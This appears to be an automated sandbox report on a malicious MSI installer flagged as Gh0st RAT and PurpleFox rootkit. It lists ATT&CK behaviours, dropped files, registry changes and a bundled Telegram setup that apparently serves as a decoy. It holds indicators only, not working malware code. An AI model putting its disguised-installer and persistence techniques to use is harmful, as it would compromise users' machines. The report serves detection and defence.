Malware Analysis Report

2024-12-07 13:05

Sample ID 241109-spgxsaxbmq
Target 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi.vir
SHA256 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf
Tags
discovery execution persistence privilege_escalation gh0strat purplefox rat rootkit trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf

Threat Level: Known bad

The file 92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi.vir was found to be: Known bad.

Malicious Activity Summary

discovery execution persistence privilege_escalation gh0strat purplefox rat rootkit trojan

Gh0st RAT payload

Gh0strat family

PurpleFox

Purplefox family

Detect PurpleFox Rootkit

Gh0strat

Command and Scripting Interpreter: PowerShell

Enumerates connected drives

Drops file in System32 directory

Loads dropped DLL

Drops file in Windows directory

Drops file in Program Files directory

Executes dropped EXE

System Network Configuration Discovery: Internet Connection Discovery

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

System Location Discovery: System Language Discovery

Runs ping.exe

Checks SCSI registry key(s)

Uses Volume Shadow Copy service COM API

Checks processor information in registry

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Modifies data under HKEY_USERS

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-09 15:17

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-09 15:17

Reported

2024-11-09 15:20

Platform

win7-20241023-en

Max time kernel

141s

Max time network

132s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\92553e176daf1cc411113c65eeec0fb2327100fc43356352787844ae85b78fdf.msi

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\Saved Games C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357 C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357 C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\SustainSleekTutor\NLGACUfhExiQgpFqVoxutQoGyuzRSw C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Windows\system32\MsiExec.exe N/A
File created C:\Program Files\SustainSleekTutor\valibclang2d.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\NLGACUfhExiQgpFqVoxutQoGyuzRSw C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe C:\Windows\system32\MsiExec.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL.vbs C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
File created C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.xml C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\2_bFchqPntlegL.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\bFchqPntlegL C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\NMnDkvvmlBOPWlKYckpqMpfXmIsbMf C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\bFchqPntlegL C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File opened for modification C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.xml C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\UhHKDmESOIjj.exe C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
File created C:\Program Files\SustainSleekTutor\lBktGjuuaOaTazRwJvXXhRyefRHhOg C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\tsetup.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.ev3 C:\Windows\system32\DrvInst.exe N/A
File created C:\Windows\Installer\f76d2ba.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76d2bd.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f76d2bb.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\INF\setupapi.ev1 C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\INF\setupapi.dev.log C:\Windows\system32\DrvInst.exe N/A
File opened for modification C:\Windows\Installer\f76d2ba.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f76d2bb.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID401.tmp C:\Windows\system32\msiexec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files\SustainSleekTutor\tsetup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\bFchqPntlegL.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\xPrAcumKTQSTxOmHKUhvPkgyTZQeAF.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\SustainSleekTutor\tsetup.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1 C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\UninstallString = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\unins000.exe\"" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Direct3D\MostRecentApplication C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\tdesktop.tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\TelegramDesktop\Capabilities\UrlAssociations\tg = "tdesktop.tg" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32\p2pcollab.dll,-8042 = "Peer to Peer Trust" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\RestartManager\Session0000\SessionHash = 5db37eef26c6c6f456c8bacc6fd041a610f370e2fc9d86d251445c7309c40c49 C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayVersion = "5.2.3" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\VersionMinor = "2" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: Deselected Tasks C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: Language = "english" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayIcon = "C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\QuietUninstallString = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\unins000.exe\" /SILENT" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\@%SystemRoot%\system32\qagentrt.dll,-10 = "System Health Authentication" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\URLUpdateInfo = "https://desktop.telegram.org" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\RestartManager\Session0000\Owner = 500300008055b5a5ba32db01 C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\ActiveMovie C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\VersionMajor = "5" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\RestartManager\Session0000\RegFiles0000 = 43003a005c00550073006500720073005c00410064006d0069006e005c0041007000700044006100740061005c0052006f0061006d0069006e0067005c00540065006c0065006700720061006d0020004400650073006b0074006f0070005c00540065006c0065006700720061006d002e00650078006500000043003a005c00550073006500720073005c00410064006d0069006e005c0041007000700044006100740061005c0052006f0061006d0069006e0067005c00540065006c0065006700720061006d0020004400650073006b0074006f0070005c0055007000640061007400650072002e00650078006500000043003a005c00550073006500720073005c00410064006d0069006e005c0041007000700044006100740061005c0052006f0061006d0069006e0067005c00540065006c0065006700720061006d0020004400650073006b0074006f0070005c006d006f00640075006c00650073005c007800360034005c006400330064005c0064003300640063006f006d00700069006c00650072005f00340037002e0064006c006c0000000000 C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\MinorVersion = "2" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\RestartManager C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\Inno Setup: App Path = "C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\DisplayName = "Telegram Desktop" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\RestartManager\Session0000 C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{53F49750-6209-4FBF-9CA8-7A333C87D1ED}_is1\NoModify = "1" C:\Users\Admin\AppData\Local\Temp\is-E0J9U.tmp\tsetup.tmp N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\tdesktop.tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\RegisteredApplications C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\D79DD49E5C47660498C5E1D7A560895F\ProductFeature C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D716B2B7A13A72439FD62E0DFA6E582 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\D79DD49E5C47660498C5E1D7A560895F\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\0D716B2B7A13A72439FD62E0DFA6E582\D79DD49E5C47660498C5E1D7A560895F C:\Windows\system32\msiexec.exe N/A
